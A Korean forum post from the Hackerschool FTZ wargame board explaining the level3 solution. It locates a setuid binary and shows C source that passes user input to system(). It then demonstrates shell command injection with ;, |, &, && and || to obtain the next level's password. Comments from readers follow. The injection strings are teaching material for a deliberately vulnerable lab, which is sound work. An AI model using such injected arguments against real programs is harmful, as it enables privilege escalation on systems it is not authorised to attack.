레벨 해킹

2844,

8/143

kuh3h3

[re] [level3]-자세한 내용입니다..

http://www.hackerschool.org/HS_Boards/zboard.php?id=QNA_level&no=2435 [복사]

자 다음은 레벨3의 정석적인 풀이입니다.

참고하세요

우선 레벨4의 setuid가 걸린 파일을 찾습니다.
[level3@ftz level3]$  find /  -perm -04000 -group level3 2> /dev/null
/bin/autodig
[level3@ftz level3]$ ls -al /bin/autodig
-rwsr-x---    1 level4   level3      22931  3월 29  2003 /bin/autodig

이번 레벨은 소스코드가 주어져 있군요.
그렇더라도 바이너리 디버깅은 해볼수록 경험이 되는겁니다.권장합니다.

[level3@ftz level3]$ cat hint

다음 코드는 autodig의 소스이다.

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main(int argc, char **argv){

    char cmd[100];

    if( argc!=2 ){
        printf( "Auto Digger Version 0.9\n" );
        printf( "Usage : %s host\n", argv[0] );
        exit(0);
    }

    strcpy( cmd, "dig @" );
    strcat( cmd, argv[1] );
    strcat( cmd, " version.bind chaos txt");

    system( cmd );

}

이를 이용하여 level4의 권한을 얻어라.

more hints.
- 동시에 여러 명령어를 사용하려면?
- 문자열 형태로 명령어를 전달하려면?
=========================================================

이 프로그램은 인수로 주어진 도메인의 네임서버 버젼을
자동으로 알아내도록 세팅된 dig 프로그램의 껍데기군요.

프로그램 작자가 의도한 정상적인 경우를 먼저 보면
훨씬 이번 레벨의 약점을 알기 쉽습니다.

다음은 그냥 dig으로 네임서버의 버젼번호를 알아내는 경우입니다.

[level1@ftz level1]$ dig @hackerschool.org  version.bind chaos txt

; <<>> DiG 9.2.1 <<>> @hackerschool.org version.bind chaos txt
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 18229
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;version.bind.                  CH      TXT

;; ANSWER SECTION:
version.bind.           0       CH      TXT     "9.2.1"

;; Query time: 60 msec
;; SERVER: 211.189.88.58#53(hackerschool.org)
;; WHEN: Sat Jul 14 17:44:42 2007
;; MSG SIZE  rcvd: 48

===============================================================
음 해쿨 네임서버의 버젼은 9.2.1 이군요 :)

그리고 다음은  dig  프로그램의 인수 4개중 세개를 절약해서 도메인 이름하나만 넣어도
되도록 간략화시킨 우리의 레벨3 autodig 프로그램입니다.

[level3@ftz level3]$ /bin/autodig hackerschool.org

; <<>> DiG 9.2.1 <<>> @hackerschool.org version.bind chaos txt
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 54691
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 0

;; QUESTION SECTION:
;version.bind.                  CH      TXT

;; ANSWER SECTION:
version.bind.           0       CH      TXT     "9.2.1"

;; Query time: 40 msec
;; SERVER: 211.189.88.58#53(hackerschool.org)
;; WHEN: Sat Jul 14 17:55:53 2007
;; MSG SIZE  rcvd: 48
=================================================================

이렇게 만 사용하면 아무문제 없겠지만

우리는 아래와 같은 뻘짓을 합니다/
[level3@ftz level3]$ /bin/autodig "test;my-pass"
dig: Couldn't find server 'test': Name or service not known

Level4 Password is "***************".
=========================================================

어떤 원리로 패스워드가 뱉어지는 걸까요?

위처럼 명령행 인수를 주면   system으로 실행될 우리 cmd의 구성은

dig @test;my-pass version.bind chaos txt

가 되어서 원래 의도만으로는 뒷부분 4개가 모두 dig 프로그램의 명령행 인수로
간주되어야 하겠지만,

실제로는 쉘 상에서 ; 기호는 여러 명령을 동시에
실행하도록 해주는 각 명령의 구분선같은 특별한 의미를 가지고 있어서

;를 기준으로 앞 뒤 두개의 명령으로 나뉘어버립니다.
즉
dig @test 라는 명령 하나,그래서 test라는 서버를 못찾겠다고 에러를 내죠.

또 my-pass version.bind chaos txt 라는 인수를 세개 갖는 명령 하나,

이 뒷부분

my-pass가 주어진 인수 세개에 관계없이 자기할일(패스워드를 뱉어내는)
만 하고 exit해버리는 거구요.

==========================================
또 다른 예로서

[level3@ftz level3]$ /bin/autodig "test|my-pass"
dig: Couldn't find server 'test': Name or service not known

Level4 Password is "***************".
처럼 명령구분자 ; 대신 pipe 기호 | 를 써도 이 파이프 기호를 기준으로
앞뒤로 명령이 나뉘고, 앞명령의 결과가 뒷명령으로 전달되면서 같은 효과가
생기게 됩니다.

========================
[level3@ftz level3]$ /bin/autodig "test&my-pass"
의 경우도 마찬가지..

그러나 && 나 || 는 조금 다르죠.
[level3@ftz level3]$ /bin/autodig "hackerschool.org&&my-pass"

&& 의 경우 앞 명령이 성공해야 뒷명령을 실행하니까 위처럼해야 합니다.

[level3@ftz level3]$ /bin/autodig "test||my-pass"
의 경우는 앞 명령이 실패해야 뒷명령이 실행되니까 그렇구요.

ㅋㅋ 재밌죠?

즉 system함수로 실행되는 cmd 문자열은 결국 쉘상에서 실행되는 명령어라서
쉘에 특수한 의미를 갖는 기호 ; 라든가 | ,&,&&,||라든가 에 영향을 받게 되는것입니다.

Hit : 3550 Date : 2007/07/14 05:06


chofly	우와 정말감사 ㅋ	2008/01/16
wpwksky	젠장..어렵군	2008/08/14
ehdals9022	멋지다	2009/08/20
punkage	제일 설명이 깔끔하게 잘되있어요. 감사합니다.^^	2010/01/27